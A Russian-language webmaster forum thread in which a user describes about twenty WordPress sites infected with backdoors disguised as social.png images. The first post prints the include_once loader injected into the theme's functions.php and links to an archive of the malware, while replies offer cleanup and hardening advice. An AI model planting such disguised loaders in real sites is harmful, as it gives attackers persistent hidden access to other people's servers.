Заражено несколько сайтов на WP на одном хостинге

(Ответов: 9, Просмотров: 1821)
  1. Гуру Аватар для Denis Creative
    • Регистрация: 21.02.2012
    • Сообщений: 555
    • Репутация: 128
    • Webmoney BL: ?
    Впервые столкнулся с таким взломом, не могу понять как и откуда.
    Суть - перестал работать один сайт, зашел на хостинг, и обнаружил несколько посторонних файлов. Проверил остальные сайты и вот, что обнаружил.

    В корне два файла wp-pass.php и wp-register.php (но не на всех сайтах), и в активной теме, то есть в папке themes может быть несколько тем, но только в активной теме лежит несколько файлов 2,3 или 4 якобы картинок с именами social.png, social0.png, social1.png или social2.png (на всех сайтах). На самом деле это закодированные php-файлы, чтобы открыть их достаточно изменить тип файла с png на php. Кому интересно - вот ссылка на архив с файлами _http://yadi.sk/d/jjopVmxEFa7XH
    И в файле functions.php в конце добавлен такой код:

    PHP код:
    <?php 
    if (!defined('WP_OPTION_KEY')) {
    include_once 
    'social.png';
    }

    if (!
    defined('WP_OPTION_KEY')) {
    include_once 
    'social0.png';
    }

    if (!
    defined('WP_OPTION_KEY')) {
    include_once 
    'social1.png';
    }

    if (!
    defined('WP_OPTION_KEY')) {
    include_once 
    'social2.png';
    }
    Файлы добавлены и обновлены все в одно время.

    Не могу понять откуда пошел взлом, и что с ним делать, как защитить сайты, раньше сталкивался с подобными вещами, но проблемы были или в плагинах или в шаблонах, сейчас вроде бы все чисто, плагины проверенные и обновляются.
    Возможна проблема в том, что есть сайты, в которых движок не обновляется, лежат старые плагины и темы.

    Кто, что может подсказать, как защитить сайты?
    Создание и продвижение сайтов на WordPress и не только.
    • 0
  2. Гуру Аватар для 3s777
    • Регистрация: 09.02.2013
    • Сообщений: 1,417
    • Репутация: 384
    • Webmoney BL: ?
    Вполне могли через уязвимость в одном сайте ломануть все остальные.
    Сначала вычистите все сайты, или восстановитесь из бэкапа. Затем обновляйте все движки и плагины до последней версии, меняйте все пароли, ставьте дополнительные плагины защиты.
    На всякий случай проверьте другие сайты на вашем хостинге, если он у вас виртуальный. А то всякое бывает. Такое у меня было Уязвимость сервера или как доказать хостеру, что он не прав.
    • 1

    Спасибо сказали:

    Denis Creative(07.01.2014),
  3. А компот??!!
    • Регистрация: 28.11.2011
    • Сообщений: 2,067
    • Репутация: 720
    • Webmoney BL: ?
    А хостер кто?
    Недавно кто то мучился со взломами, оказалось у хостера дыра.
    • 0
  4. Гуру Аватар для Denis Creative
    • Регистрация: 21.02.2012
    • Сообщений: 555
    • Репутация: 128
    • Webmoney BL: ?
    Как бы еще вычислить, где уязвимость, около 20 сайтов... Буду вручную удалять все лишнее и обновлять..

    Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 10 сообщение(ий)):
    У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.
    Создание и продвижение сайтов на WordPress и не только.
    • 0
  5. А компот??!!
    • Регистрация: 28.11.2011
    • Сообщений: 2,067
    • Репутация: 720
    • Webmoney BL: ?
    Denis Creative, По логам попробуйте посмотреть.
    • 1

    Спасибо сказали:

    Denis Creative(07.01.2014),
  6. Гуру Аватар для 3s777
    • Регистрация: 09.02.2013
    • Сообщений: 1,417
    • Репутация: 384
    • Webmoney BL: ?
    Denis Creative, если есть возможность, то лучше восстанавливайте из бэкапа на момент когда сайт еще не был заражен, и сразу же обновляйте и меняйте пароли, так надежнее будет
    Просто если чистить все вручную, то можно пропустить нежелательные файлы, а они в свою очередь обеспечат взломщику новую дыру.
    • 1

    Спасибо сказали:

    Denis Creative(07.01.2014),
  7. Гуру Аватар для Denis Creative
    • Регистрация: 21.02.2012
    • Сообщений: 555
    • Репутация: 128
    • Webmoney BL: ?
    Обнаружил в некоторых сайтах после переноса с Денвера остались незаполненные ключи
    PHP код:
    define('AUTH_KEY',         'впишите сюда уникальную фразу');
    define('SECURE_AUTH_KEY',  'впишите сюда уникальную фразу');
    define('LOGGED_IN_KEY',    'впишите сюда уникальную фразу');
    define('NONCE_KEY',        'впишите сюда уникальную фразу');
    define('AUTH_SALT',        'впишите сюда уникальную фразу');
    define('SECURE_AUTH_SALT''впишите сюда уникальную фразу');
    define('LOGGED_IN_SALT',   'впишите сюда уникальную фразу');
    define('NONCE_SALT',       'впишите сюда уникальную фразу'); 
    Может ли это быть уязвимостью?


    После удаления этих файлов картинок и чистки functions.php, они восстанавливаются через время, так что нужно сначала найти источник заражения...
    Создание и продвижение сайтов на WordPress и не только.
    • 0
  8. Гуру Аватар для KipiaSoft
    • Регистрация: 16.11.2009
    • Сообщений: 638
    • Записей в дневнике: 4
    • Репутация: 255
    • Webmoney BL: ?
    и чистки functions.php
    просто почистить мало, нужно права на файлы выставлять, запрещающие запись в файл - 444 или 555 в зависимости от назначение файла
    • 1

    Спасибо сказали:

    Denis Creative(07.01.2014),
  9. Дипломник Аватар для Gnoma
    • Регистрация: 09.08.2013
    • Сообщений: 139
    • Репутация: 50
    • Webmoney BL: ?
    Denis Creative, надо делать бекап прошлым числом (тем, в котором еще сайты живы были) + внимательно выставлять права + менять все-все пароли.
    • 1

    Спасибо сказали:

    Denis Creative(07.01.2014),
  10. Гуру Аватар для akrustam
    • Регистрация: 21.05.2010
    • Сообщений: 1,161
    • Репутация: 285
    • Webmoney BL: ?
    Цитата Сообщение от Dolmatov Посмотреть сообщение
    По логам попробуйте посмотреть.
    Часто чистят.
    • 0

Похожие темы

Темы Раздел Ответов Последний пост
Доры + белые сайты на одном хостинге.
Вопросы от новичков 8 18.06.2013 18:46
Два домена на одном хостинге и htaccess
Вопросы от новичков 0 09.05.2013 01:36
Склейка двух доменов на одном хостинге.
Вопросы от новичков 1 24.02.2012 17:31
Несколько сайтов на одном хостнге ?
Прочее 11 21.11.2011 02:40
Безопасно ли держать все сайты на одном хостинге?
Хостинг и Серверы 15 26.08.2011 10:04

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры